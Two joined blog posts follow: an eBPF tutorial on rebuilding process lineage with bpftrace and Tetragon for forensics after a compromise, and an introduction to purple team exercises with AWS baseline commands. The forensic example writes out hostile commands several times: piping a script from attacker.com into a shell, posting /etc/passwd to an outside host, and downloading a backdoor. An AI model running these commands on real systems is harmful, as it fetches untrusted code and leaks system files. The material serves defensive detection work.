Process Lineage — Reconstructing What Happened After the Fact

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 13
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability · LSM and Tetragon · Process Lineage


Architecture Overview

eBPF Process Lineage — kernel-level process ancestry tracking for runtime security forensics
eBPF tracks every exec() and fork() in the kernel — reconstructing the full process tree for forensic attribution.

TL;DR

  • Process lineage with eBPF hooks fork and exec at the kernel level — building a tamper-resistant record of every process spawned, tied to its parent, pod, namespace, and timestamp
    (kprobe on fork/exec = an eBPF program that fires every time the kernel’s fork() or execve() system call runs, capturing process name, PID, parent PID, and arguments before any userspace observer could be bypassed)
  • Application logs and container stdout can be deleted or suppressed by a compromised process; kernel-level process events written to a ringbuf and exported to a persistent store cannot
  • The kernel’s task_struct contains the complete process identity: PID, PPID, UID, GID, process name, capabilities, and cgroup (which maps directly to a pod)
  • Tetragon and Falco both build process lineage from kernel events; the difference is storage — Tetragon persists a kernel-side cache of the process tree in BPF maps, Falco reconstructs lineage from an audit log stream
  • Reconstructing an incident from process lineage requires: who spawned the attacker’s process, what did it execute, what files did it open, what connections did it make — all correlated by PID and timestamp
  • Production caution: process events on a busy node can generate high ringbuf write volume; filter aggressively by namespace/cgroup at the eBPF level, not in userspace

EP12 showed how LSM hooks enforce at the syscall boundary — preventing operations before they complete. Process lineage with eBPF is the complementary capability: when an attacker bypasses enforcement, or when you need to understand what happened before the policy was in place, the kernel-level process record is how you reconstruct the attack chain. This episode covers how that record is built and how to read it.

Quick Check: What Process Events Is Your Cluster Already Recording?

# On any cluster node — verify exec tracing is available
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%-20s %-6d %s\n", comm, pid, str(args->filename));
}' --timeout 10

# Expected output:
# containerd-shim     1203   /usr/bin/runc
# runc                1204   /usr/sbin/runc
# sh                  1205   /bin/sh
# node                1842   /usr/local/bin/node
# kube-proxy          2091   /usr/local/bin/kube-proxy
# If Tetragon is installed — view the live process lineage stream
kubectl exec -n kube-system \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_EXEC | head -20

Sample Tetragon output:

{
  "process_exec": {
    "process": {
      "pid": 18293,
      "binary": "/bin/sh",
      "arguments": "-c health-check.sh",
      "start_time": "2026-04-22T09:14:03.412Z",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"},
      "parent_pid": 18201
    },
    "parent": {
      "pid": 18201,
      "binary": "/usr/local/bin/my-app",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"}
    }
  }
}

Each event has the process, its parent, the pod, the namespace, and the full binary path. That’s the raw material for process lineage reconstruction.

Not running Tetragon? Plain bpftrace on the node gives you the same raw data without Kubernetes enrichment — you get PIDs and process names but not pod names or namespaces without the /proc/<pid>/cgroup mapping step. For incident reconstruction, the Tetragon-enriched stream is significantly more useful because pod attribution is baked in at capture time, not reconstructed afterward.


A container in the payments namespace was reported compromised. The security team’s automated response had already restarted the pod — the attacker’s process was gone. The container’s filesystem had been reset to the image. The application logs for that pod were deleted when the pod restarted. The Kubernetes event log showed the pod restart but nothing about what had run inside it.

Three questions, no answers yet:
1. What spawned the attacker’s process? (was it a remote code execution in the app, or a misconfigured exec?)
2. What did the attacker run after getting in? (what did they download, execute, touch?)
3. What network connections did they make? (where did data go, if anywhere?)

The answers were in Tetragon’s process event export — captured at the kernel level before the pod was restarted, stored in the observability backend, and queryable by pod name and time window. The kernel had seen every exec, every fork, every file open. The restart didn’t touch that record.

The lineage showed:

my-app (PID 18201)
  └── sh -c "curl http://attacker.com/payload.sh | sh"  (PID 18293)
        └── sh payload.sh  (PID 18294)
              ├── cat /etc/passwd  (PID 18295)
              ├── curl http://attacker.com/exfil -d @/etc/passwd  (PID 18296)
              └── wget -O /tmp/.x http://attacker.com/backdoor  (PID 18297)
                    └── chmod +x /tmp/.x  (PID 18298)

Five minutes of attacker activity, fully reconstructed, from a pod that no longer existed.


How the Kernel Tracks Process Identity

Every process in Linux is represented by a task_struct — the kernel’s internal data structure for a running process. It contains everything the kernel knows about that process.

task_struct — the kernel’s primary data structure for a process. Contains: PID, PPID, UID, GID, process name (comm, 15 chars), open file descriptors, memory mappings, namespace references, cgroup membership, capabilities, and a pointer to the parent task_struct. When bpftrace uses curtask, it’s returning a pointer to the current process’s task_struct. Reading curtask->real_parent->tgid gives you the parent’s PID — the foundation of process lineage.

When a process calls fork(), the kernel:
1. Allocates a new task_struct for the child
2. Copies the parent’s task_struct fields into the child
3. Sets the child’s real_parent pointer to the parent’s task_struct
4. Assigns the child a new PID
5. Returns the child’s PID to the parent, and 0 to the child

When the child calls execve(), the kernel:
1. Validates the binary (verifier/capability checks, LSM hooks)
2. Replaces the process’s memory image with the new binary
3. Updates task_struct->comm with the new process name
4. The PID does not change — execve replaces the process image but not the process identity

This forkexec sequence is how every shell command works: the shell forks a child, the child execs the command. eBPF hooks on both events, correlated by PID and parent PID, give you the complete tree.


Building the Process Tree with kprobes

The two core hooks for process lineage:

# Every fork — capture parent/child relationship
bpftrace -e '
tracepoint:syscalls:sys_exit_clone {
    if (retval > 0) {
        # retval is the child PID (from parent's perspective)
        printf("FORK parent=%-6d child=%-6d parent_comm=%-20s\n",
               pid, retval, comm);
    }
}'
# Every exec — capture what binary replaced the process image
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("EXEC pid=%-6d ppid=%-6d binary=%-40s args=%s\n",
           pid,
           curtask->real_parent->tgid,
           str(args->filename),
           str(*args->argv));
}'

Combined output (30 seconds, simplified):

FORK parent=18201 child=18293  parent_comm=my-app
EXEC pid=18293 ppid=18201 binary=/bin/sh              args=sh -c curl http://...
FORK parent=18293 child=18294  parent_comm=sh
EXEC pid=18294 ppid=18293 binary=/bin/sh              args=sh payload.sh
FORK parent=18294 child=18295  parent_comm=sh
EXEC pid=18295 ppid=18294 binary=/bin/cat             args=cat /etc/passwd
FORK parent=18294 child=18296  parent_comm=sh
EXEC pid=18296 ppid=18294 binary=/usr/bin/curl        args=curl http://attacker.com/exfil -d @/etc/passwd

Each line is a kernel event. The parent/child PID chain is the tree. Rendered:

my-app (18201)
  └── sh (18293) — "sh -c curl http://attacker.com/payload.sh | sh"
        └── sh (18294) — "sh payload.sh"
              ├── cat (18295) — "/etc/passwd"
              └── curl (18296) — "http://attacker.com/exfil -d @/etc/passwd"

This tree is constructed entirely from kernel events. No application logging. No container stdout. No agent inside the container.


How Tetragon Stores the Process Tree in BPF Maps

bpftrace’s approach above produces an event stream — a log you reconstruct manually. Tetragon takes a different approach: it maintains a live process tree in BPF maps, updated on every fork and exec event, persistently queryable.

Kernel events (kprobe on clone, execve, exit)
      ↓
Tetragon eBPF programs
      ↓
Write to BPF_MAP_TYPE_HASH: process_cache
      key: PID
      value: {binary, args, start_time, parent_pid, pod_name, namespace, uid, gid, caps}
      ↓
Tetragon userspace agent
      reads process_cache on events
      enriches with Kubernetes pod metadata (from informer cache)
      exports to gRPC stream → observability backend

task_struct in BPF maps — Tetragon doesn’t store the raw task_struct pointer in its maps (pointers are not stable across process lifetime). Instead, it stores a snapshot of the relevant fields (PID, binary path, arguments, capabilities, cgroup path, start time) at the moment of the exec event, keyed by PID. When the process exits, the entry is kept in the cache for a configurable window to allow late-arriving events (like file closes or connection terminations) to be correlated back to the originating process.

To inspect Tetragon’s process cache directly:

# Find the Tetragon process cache map
bpftool map list | grep process_cache

# 112: hash  name process_cache  flags 0x0
#      key 4B  value 256B  max_entries 65536  memlock 16777216B

# Dump a few entries
bpftool map dump id 112 | head -60

# [{
#     "key": 18293,                           # ← PID
#     "value": {
#         "binary": "/bin/sh",
#         "args": "sh -c curl http://...",
#         "pid": 18293,
#         "ppid": 18201,
#         "uid": 1000,
#         "start_time": 1745296443,
#         "cgroup": "kubepods/burstable/pod3f8a21bc/.../payments"
#     }
# }]

The cgroup field maps directly to the pod — same path as /proc/<pid>/cgroup but captured at exec time and stored in kernel space.


Correlating Files and Connections to the Process Tree

Process lineage is most useful when combined with the file access and network connection events from the same process. Tetragon’s TracingPolicy supports this multi-event correlation natively:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-process-lineage
spec:
  kprobes:
    - call: "security_inode_permission"
      syscall: false
      args:
        - index: 0
          type: "inode"
      selectors:
        - matchNamespaces:
            - namespace: Net
              operator: "NotIn"
              values: ["1"]    # exclude host network namespace
          matchActions:
            - action: Post   # audit: log but don't block
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchActions:
            - action: Post

With this policy active, Tetragon emits events for both file access and TCP connections, each carrying the full process context (PID, binary, pod, parent). Correlated by PID and timestamp:

tetra getevents | jq 'select(.process_kprobe.function_name == "tcp_connect") |
  {pid: .process_kprobe.process.pid,
   binary: .process_kprobe.process.binary,
   pod: .process_kprobe.process.pod.name,
   dst: .process_kprobe.args[0].sock_arg.daddr}'

Sample output:

{"pid": 18296, "binary": "/usr/bin/curl", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}
{"pid": 18297, "binary": "/usr/bin/wget", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}

PID 18296 and 18297 both connected to the same IP. Cross-reference with the process tree: those are the curl and wget spawned by the attacker’s payload script. The destination IP is the attacker’s infrastructure. The timeline is milliseconds-precise because the events are timestamped by the kernel at the hook point.


Building Process Lineage Without Tetragon

If you’re not running Tetragon, you can build a basic process lineage recorder with bpftrace that writes to a file:

# Record all exec events to a file — run in the background on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%llu EXEC pid=%-6d ppid=%-6d binary=%s\n",
           nsecs, pid, curtask->real_parent->tgid, str(args->filename));
}
tracepoint:sched:sched_process_exit {
    printf("%llu EXIT pid=%-6d comm=%s\n", nsecs, pid, comm);
}
' > /var/log/process-lineage.log &

# Tail the log for real-time observation
tail -f /var/log/process-lineage.log

Sample output:

1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh

This file survives pod restarts because it’s on the node, not in the container. After the pod is restarted, the process lineage record is still on disk. You reconstruct the tree by grouping by ppid and ordering by timestamp.


⚠ Production Gotchas

Ringbuf saturation on high-process-churn nodes. Nodes running serverless workloads or short-lived batch jobs may spawn thousands of processes per minute. Hooking exec on every process at that rate generates a high ringbuf write volume. Filter at the eBPF level by cgroup (namespace) rather than in userspace — sending events to userspace only to discard them wastes ringbuf space and CPU. Tetragon’s namespace selector does this filtering in the eBPF program before the write.

The 15-character comm truncation. The comm field in task_struct is limited to 15 characters (plus null terminator). Process names longer than 15 characters are truncated. bpftrace‘s comm built-in has the same limit. For the full binary path, read from execve‘s filename argument at the tracepoint, not from comm.

PID reuse. Linux PIDs are reused after a process exits. In a high-churn environment, a PID you recorded as an attacker process may be reassigned to a legitimate process seconds later. Always pair PIDs with start time and cgroup path when correlating across events. Tetragon’s process cache keys on PID + start time to handle this.

Exec chains lose argument history. When execve replaces the process image, task_struct->comm changes but the PID does not. If the attacker’s shell runs exec bash to replace itself with a less suspicious binary name, the exec event captures the new binary — but the PID lineage still shows the parent correctly. Don’t rely on comm alone for process identity; always track the binary path from the exec event.

Process events don’t capture file content. You see that /bin/cat /etc/passwd ran. You don’t see what was in /etc/passwd at that moment unless you also capture file open/read events. Tetragon’s security_inode_permission hook tells you which files were accessed; capturing their content requires additional hooks on vfs_read with buffer capture, which is significantly higher overhead and requires careful data handling for sensitive files.


Quick Reference

What you want Command
Live exec trace (bpftrace) bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf(...) }'
Fork + exec tree Combine sys_exit_clone + sys_enter_execve traces, correlate by pid/ppid
Tetragon process events tetra getevents --event-types PROCESS_EXEC
Tetragon file + network tetra getevents --event-types PROCESS_KPROBE
Process cache map bpftool map list | grep process_cachebpftool map dump id N
Map PID to pod cat /proc/<pid>/cgroup → extract pod UID
Process exit events tracepoint:sched:sched_process_exit
Process event Kernel hook
New process spawned tracepoint:syscalls:sys_exit_clone (retval > 0 = child PID)
Binary executed tracepoint:syscalls:sys_enter_execve
Process exited tracepoint:sched:sched_process_exit
File opened tracepoint:syscalls:sys_enter_openat
Network connect kprobe:tcp_connect
DNS query tracepoint:syscalls:sys_enter_sendto (port 53)

Key Takeaways

  • Process lineage with eBPF hooks fork and exec at the kernel level — every process spawned on a node is recorded with its parent PID, binary path, arguments, and container context, regardless of what the container does to suppress application logs
  • The kernel’s task_struct is the authoritative source of process identity; eBPF programs read it at hook time and snapshot the relevant fields into BPF maps before the process can exit or be killed
  • Tetragon maintains a live process tree in BPF maps, correlates it with Kubernetes metadata, and makes it queryable by pod/namespace — the record persists after the pod is restarted
  • Incident reconstruction requires correlating process lineage with file access events and network connection events, all correlated by PID and timestamp — eBPF provides all three event streams from the same kernel attachment mechanism
  • PID reuse is a real concern in high-churn environments; always pair PIDs with start time and cgroup path when correlating across events
  • Kernel-level process events cannot be suppressed by a compromised container process — an attacker with root inside the container still cannot prevent bpftrace or Tetragon running on the host from recording their syscalls

What’s Next

EP14 is the payoff episode for the entire series arc so far. You’ve seen programs load (EP04), maps hold state (EP05), CO-RE keep programs portable (EP06), XDP and TC enforce at the network layer (EP07, EP08), bpftrace ask one-off questions (EP09), and the observability stack collect flow, DNS, and process data continuously (EP10, EP11, EP12, EP13).

EP14 synthesises all of it into four commands that tell you everything about any cluster you’ve never seen before — any eBPF-based tool, any vendor, any configuration. The audit playbook is what you run in the first 10 minutes when you inherit a cluster and need to understand what’s enforcing policy at the kernel level before you can trust anything it tells you.

Next: the audit playbook — four commands to see any cluster

Get EP14 in your inbox when it publishes → linuxcent.com/subscribe

What Is Purple Team Security: Red + Blue = Better Defense

Reading Time: 8 minutes

What Is Purple Team SecurityOWASP Top 10 mapped to cloud infrastructureCloud security breaches 2020–2025


TL;DR

  • Purple team security is the practice of combining offensive (red) and defensive (blue) work in the same exercise — attackers simulate real techniques while defenders tune detection in real time
  • Traditional red team engagements produce a report; purple team produces a faster MTTD (mean time to detect)
  • The structural output is not a findings list — it’s updated detection rules, tested playbooks, and a measured detection baseline
  • Purple team is not a permanent headcount; it is a cadence of exercises run against your own infrastructure
  • Every episode in this series follows the red-blue-purple model: attack simulation → detection → structural fix

OWASP Mapping: This episode establishes the series methodology. No single OWASP category. Subsequent episodes map directly to A01 through A10.


The Big Picture

┌─────────────────────────────────────────────────────────────────┐
│                    PURPLE TEAM MODEL                            │
│                                                                 │
│   RED TEAM                    BLUE TEAM                         │
│   (Offensive)                 (Defensive)                       │
│                                                                 │
│   ┌──────────┐               ┌──────────┐                       │
│   │ Simulate │──── attack ──▶│  Detect  │                       │
│   │ attack   │               │  alert   │                       │
│   └──────────┘               └──────────┘                       │
│         │                          │                            │
│         └──────────┬───────────────┘                            │
│                    │                                            │
│              ┌─────▼──────┐                                     │
│              │  DEBRIEF   │  ← The purple layer                 │
│              │ What fired?│                                      │
│              │ What didn't│                                      │
│              │ Why?       │                                      │
│              └─────┬──────┘                                     │
│                    │                                            │
│         ┌──────────▼──────────┐                                 │
│         │  Updated detection  │                                 │
│         │  rules + playbooks  │                                 │
│         └─────────────────────┘                                 │
│                                                                 │
│   OUTCOME: Detection time drops exercise-over-exercise          │
└─────────────────────────────────────────────────────────────────┘

What is purple team security? It is the structured practice of attacking your own infrastructure — with full visibility on both sides — so that detection logic improves after every exercise, not just after a real breach.


Why Red vs. Blue Alone Fails

Eleven days.

That was how long an attacker had access before my blue team detected the compromise in a red team engagement I ran two years ago. It was a standard authorized engagement — well-scoped, realistic techniques, no shortcuts. The red team was good. The blue team was experienced. And still: eleven days.

The debrief was the turning point. The red team had used techniques that generated logs — CloudTrail entries, VPC Flow Log anomalies, process spawn events. The blue team had the data. The detections just weren’t tuned for these specific patterns. Nobody had ever run the techniques against this specific environment and verified whether the alerts fired.

We restructured the next exercise as a purple team exercise. Same attacker techniques. But this time, the blue team was in the room with the red team. They watched each technique execute in real time. They checked whether the alert fired. When it didn’t, they wrote the detection rule on the spot and verified it before moving to the next technique.

Detection time in the following exercise: four hours.

That is the entire argument for purple team security. Not philosophy. Not org charts. Eleven days versus four hours.


What Red Team Alone Gets Wrong

Traditional red team engagements produce a report with findings. The findings describe what the attacker did. The recommendations describe what to fix. Then the report goes to a remediation queue, the org closes the tickets over three months, and the detection logic is never tested.

The fundamental problem: a red team report tells you what happened; it doesn’t tell you whether your detection would catch it happening again.

The MITRE ATT&CK framework lists over 400 techniques. An annual red team engagement tests maybe 20 of them against your environment. You get a PDF. You don’t get a detection baseline.

Red team alone also creates adversarial dynamics inside the organization. Red team wins when they’re not caught. Blue team wins when they catch everything. These goals are structurally opposed, which means neither team has an incentive to share information that would help the other.


What Blue Team Alone Gets Wrong

Blue team without red team input is writing detection rules in the abstract. They tune alerts based on what they think an attacker would do, not what an attacker actually does against your specific environment with your specific tooling.

Signature-based detection catches known-bad. Behavioral detection catches anomalies. Neither catches a sophisticated attacker who has studied your baseline — unless you’ve explicitly tested whether the behavior that attacker uses registers as an anomaly in your environment.

Blue teams also tend toward alert fatigue. When everything fires, nothing gets investigated. Tuning requires knowing which signals correspond to real techniques, and that knowledge only comes from running the techniques.


The Purple Team Model: How It Actually Works

Purple team security is not a permanent team structure. You don’t hire a purple team. You run purple team exercises.

The exercise structure:

1. SCOPE          — agree on the attack scenario (e.g., "compromised developer credentials")
2. RED EXECUTES   — red team runs the first technique in the scenario
3. BLUE OBSERVES  — blue team watches for the alert; records: fired / not fired / noisy
4. DEBRIEF        — immediate, technique by technique. Why didn't it fire? What data existed?
5. TUNE           — blue team updates detection rule. Red team re-runs. Verify it fires.
6. NEXT TECHNIQUE — repeat for every technique in the scenario
7. MEASURE        — record detection rate and detection time at the end of the exercise

The output of a purple team exercise is not a PDF. It is:
– Updated detection rules (tested and verified)
– A measured detection time for each technique
– A documented attack scenario with the specific commands used
– A baseline for the next exercise to beat

This is what “purple” means: the red and blue work together, in the same room or on the same call, producing improved defense as a direct output of the attack simulation.


The MITRE ATT&CK Scaffolding

Every purple team exercise is anchored to ATT&CK techniques. ATT&CK provides the shared vocabulary: red team uses technique T1078 (Valid Accounts), blue team knows which data sources detect T1078, and the exercise verifies whether those detections are actually implemented and tuned.

MITRE ATT&CK Technique
         │
         ├── Tactic: Initial Access / Persistence / Lateral Movement / ...
         ├── Data Sources: CloudTrail, Process events, Network traffic, ...
         ├── Detection: What behavioral indicator to look for
         └── Mitigations: What configuration change prevents or limits it

When you scope a purple team exercise using ATT&CK, you get explicit coverage tracking. After six exercises, you can report: “We have verified detections for 47 of the 112 techniques most relevant to our threat model. These 65 are not yet covered.”

That is a measurable security posture improvement. It is auditable. It is repeatable.


Where OWASP Fits in This Series

This series uses OWASP Top 10 (2021) as the threat taxonomy, not ATT&CK. The reason: OWASP Top 10 maps directly to the classes of vulnerability that caused the major breaches between 2020 and 2025 — and it is familiar to the developers and architects who need to remediate them.

The next episode maps every OWASP Top 10 category to its cloud and Kubernetes infrastructure equivalent. Most engineers think OWASP applies only to web applications. It doesn’t. Broken Access Control (A01) is the S3 bucket that’s public when it shouldn’t be. Cryptographic Failures (A02) is the environment variable with a plaintext database password committed to GitHub. Injection (A03) is the SSRF that hits the EC2 metadata endpoint.

The framing shifts. The categories don’t.


Red Phase Primer: How Attack Simulations Work in This Series

Every episode from EP04 onward follows this structure:

Red phase — the technique the attacker uses, with the actual commands. Not “the attacker exploited misconfigured IAM.” The actual aws CLI command or kubectl invocation that demonstrates the technique. Commands are safe for authorized use in your own environment or a test account.

Blue phase — what detection looks like. The CloudTrail event, the GuardDuty finding, the Falco rule, the SIEM query. If it doesn’t fire by default, the episode says so explicitly — and shows you how to make it fire.

Purple phase — the structural fix. Not “train your developers to be more careful.” The IAM policy, the SCPs, the network control, the pre-commit hook. The thing that makes the vulnerability not exist, not the thing that makes humans try harder to avoid it.


Run This in Your Own Environment: Baseline Your Current Detection Coverage

Before EP02, establish a detection baseline. This tells you where you start, so later exercises have a number to beat.

aws guardduty list-findings \
  --detector-id $(aws guardduty list-detectors --query 'DetectorIds[0]' --output text) \
  --finding-criteria '{
    "Criterion": {
      "updatedAt": {
        "GreaterThanOrEqual": '$(date -d '30 days ago' +%s000)'
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 50 aws guardduty get-findings \
    --detector-id $(aws guardduty list-detectors --query 'DetectorIds[0]' --output text) \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, severity: .Severity, count: 1}' | \
  jq -s 'group_by(.type) | map({type: .[0].type, count: length})'
# Check if CloudTrail is enabled and logging management events
aws cloudtrail describe-trails --query 'trailList[].{Name:Name,MultiRegion:IsMultiRegionTrail,LoggingEnabled:HasCustomEventSelectors}' --output table
# Check if S3 server access logging is enabled on all buckets
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    logging=$(aws s3api get-bucket-logging --bucket "$bucket" 2>/dev/null)
    if [ -z "$logging" ] || echo "$logging" | grep -q '{}'; then
      echo "NO LOGGING: $bucket"
    else
      echo "LOGGING OK: $bucket"
    fi
  done

Record your current findings count by category and the number of buckets without logging. These are your pre-exercise baselines.


⚠ Common Mistakes When Starting a Purple Team Practice

Running it as an annual event. One purple team exercise per year produces a report. Monthly exercises with 3–5 techniques each produce measurable improvement in detection time. Frequency is the variable.

Letting red and blue work in separate rooms. The purple layer is the debrief. If red sends a report and blue reads it later, you’ve just done a red team engagement. The real-time shared observation is what generates the immediate detection improvement.

Measuring success as “how many vulnerabilities were found.” The right metric is detection time per technique and detection coverage across your ATT&CK or OWASP matrix. Vulnerabilities found is an output of the exercise; faster detection is the outcome.

Starting with sophisticated techniques. The first exercise should test basics: credential access, S3 enumeration, IAM privilege escalation attempts. These generate straightforward logs in CloudTrail. If your detection doesn’t catch these, it won’t catch the sophisticated stuff either. Start where the coverage gaps are most embarrassing.

No documentation of the exercise environment state. If you tune a detection rule during an exercise and then a Terraform change overwrites the policy, you’ve lost the improvement. All detection changes from exercises go through version control immediately.


Quick Reference

Term Definition
Purple team security Practice of combined red/blue exercises where both teams improve detection together
MTTD Mean Time to Detect — the primary metric purple team exercises reduce
ATT&CK MITRE framework mapping adversary techniques to data sources and detections
Red phase Attacker perspective: simulate the technique with real commands
Blue phase Defender perspective: what detection fires (or doesn’t)
Purple phase The joint debrief and immediate detection tuning that makes both better
Detection baseline Measured MTTD and technique coverage before the first exercise
OWASP Top 10 Threat taxonomy used in this series — applies to infrastructure, not just web apps

Key Takeaways

  • Purple team security is a practice, not a team: structured exercises where red attacks and blue detects in real time, with joint debrief producing updated detection rules
  • The metric that matters is detection time per technique — not findings count
  • Red team alone produces a report; purple team produces a faster MTTD and tested detection coverage
  • MITRE ATT&CK provides the technique vocabulary; OWASP Top 10 provides the vulnerability taxonomy this series uses
  • Every major cloud breach 2020–2025 maps to an OWASP category — those categories are the exercise backlog for any cloud-running organization
  • Detection improvements from exercises must be version-controlled immediately or they disappear with the next infrastructure change
  • Frequency of exercises is the primary driver of improvement — monthly beats annual by an order of magnitude

What’s Next

EP02 maps every OWASP Top 10 category to its cloud infrastructure equivalent. Most engineers treat OWASP as a web application concern. The cloud security breaches from 2020 to 2025 tell a different story: the S3 bucket that became public is A01; the CI/CD pipeline secret is A08; the SSRF to EC2 metadata is A10. The taxonomy was always infrastructure-applicable. EP02 makes that mapping explicit — with the cloud-native equivalent, the real breach that demonstrates it, and the detection query to run.

Get EP02 in your inbox when it publishes → subscribe at linuxcent.com